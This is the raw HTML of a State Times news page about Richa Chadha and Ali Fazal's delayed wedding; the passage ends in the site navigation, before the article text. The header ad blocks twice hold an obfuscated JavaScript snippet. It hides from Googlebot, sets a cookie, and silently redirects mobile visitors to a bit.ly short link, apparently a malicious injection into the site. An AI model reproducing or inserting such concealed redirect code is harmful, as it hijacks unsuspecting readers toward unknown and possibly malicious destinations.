<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head><script>window.w3tc_lazyload=1,window.lazyLoadOptions={elements_selector:".lazy",callback_loaded:function(t){var e;try{e=new CustomEvent("w3tc_lazyload_loaded",{detail:{e:t}})}catch(a){(e=document.createEvent("CustomEvent")).initCustomEvent("w3tc_lazyload_loaded",!1,!1,{e:t})}window.dispatchEvent(e)}}</script><style>img.lazy{min-height:1px}</style><script async src="http://news.statetimes.in/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js?x28364"></script>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&h=1024&w=1024"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Mumbai: Actors Richa Chadha and Ali Fazal have postponed their wedding to later half of the year amid the coronavirus pandemic, the spokesperson for the couple announced on Thursday. Richa and Ali wer"/>
<meta property="og:url" content="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x28364" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x28364" />

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x28364"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x28364"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare Comments Feed" href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://news.statetimes.in/wp-includes/css/dist/block-library/style.min.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x28364' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x28364' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x28364'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x28364'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='ICSE board class 10,12 exams postponed till March 31' href='http://news.statetimes.in/icse-board-class-1012-exams-postponed-till-march-31/' />
<link rel='next' title='We are all in this together: Finch on possible financial losses due to COVID-19' href='http://news.statetimes.in/we-are-all-in-this-together-finch-on-possible-financial-losses-due-to-covid-19/' />
<meta name="generator" content="WordPress 5.3.2" />
<link rel="canonical" href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=595821' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fricha-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fricha-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare%2F&#038;format=xml" />
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x28364" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-595821 single-format-standard both-sidebars-all both-sidebars singular layout-boxed both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" rel="noopener noreferrer" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" rel="noopener noreferrer" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" rel="noopener noreferrer" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" rel="noopener noreferrer" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20445%2077'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x28364" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20445%2077'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x28364" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-711 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-711 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-711 .adr-next',
				prev: '.e3lanat-rotator-id-711 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-711" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-skew ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/' title='COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/1-6.jpeg&h=60&w=90' alt='COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/covid-19-after-one-person-has-been-detected-positive-in-khanyar-authorities-imposed-restrictions-in-srinagar/' title='COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.'> COVID-19: After one person has been detected positive in Khanyar, authorities imposed restrictions in Srinagar.</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/dr-syed-abid-rashid-shah-assumes-charge-as-ceo-jk-era-jtfrp/' title='Dr Syed Abid Rashid Shah assumes charge as CEO, J&#038;K ERA/JTFRP'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364' alt='Dr Syed Abid Rashid Shah assumes charge as CEO, J&#038;K ERA/JTFRP' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/dr-syed-abid-rashid-shah-assumes-charge-as-ceo-jk-era-jtfrp/' title='Dr Syed Abid Rashid Shah assumes charge as CEO, J&#038;K ERA/JTFRP'> Dr Syed Abid Rashid Shah assumes charge as CEO, J&#038;K ERA/JTFRP</a><span> - 10 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/' title='J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat'><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2070%2047'%3E%3C/svg%3E" data-src='http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/LIEUTENANT-GOVERNOR-CHAIRING-STATE-ADMINISTRATIVE-COUNCIL-MEETING-18.jpg&h=60&w=90' alt='J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/jk-residents-to-have-rs-5-lakh-free-health-insurance-like-ayushman-bharat/' title='J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat'> J&#038;K residents to have Rs 5 lakh free Health Insurance like Ayushman Bharat</a><span> - 10 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a 